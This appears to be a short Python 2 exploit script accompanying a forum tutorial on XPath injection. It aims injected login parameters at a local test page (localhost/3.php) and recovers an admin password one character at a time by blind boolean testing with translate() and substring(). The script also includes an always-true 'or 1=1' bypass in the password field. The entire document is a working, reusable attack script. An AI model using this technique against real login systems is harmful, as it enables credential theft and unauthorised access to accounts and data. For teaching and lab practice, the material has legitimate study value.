Xpath exploit (translate)

1. #For sec4ever xpath injection tut
2. #http://www.sec4ever.com/home/showthread.php?t=16741
3. #Author : i-Hmx
4. import urllib2
5. import urllib
6. import time
7. start=time.time()
8. chars="abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()/*-+." #yes yes , every thing :))
9. length=10
10. pwd=''
11. q=0
12. for i in range(1,(length+1)):
13.     for char in chars:
14.         #Getting char in lower case
15.         data=urllib2.urlopen("http://localhost/3.php?"+urllib.urlencode({ 'user' : "admin' and translate(substring(pwd,"+str(i)+",1), 'ABCDEFGHIJKLMNOPQRSTUVWXYZ', 'abcdefghijklmnopqrstuvwxyz')='"+char+"' and '1'='1", 'pass' : "sec4' or '1'='1"})).read()
16.         q=q+1
17.         if data.find("logged")!=-1:
18.             #If true : comparing it with upper case
19.             data=urllib2.urlopen("http://localhost/3.php?"+urllib.urlencode({ 'user' : "admin' and substring(pwd,"+str(i)+",1)='"+char.upper()+"' and '1'='1", 'pass' : "sec4' or '1'='1"})).read()
20.             q=q+1
21.             if data.find("logged")!=-1:
22.                 print "["+str(i)+"] -> "+char.upper()
23.                 pwd=pwd+(char.upper())
24.                 break
25.             else:
26.                 print "["+str(i)+"] -> "+char
27.                 pwd=pwd+char
28.                 break
29. end=time.time()
30. print "\nPassword : "+pwd
31. print "Number of queries : "+str(q)
32. print "Time taken : "+str(end-start)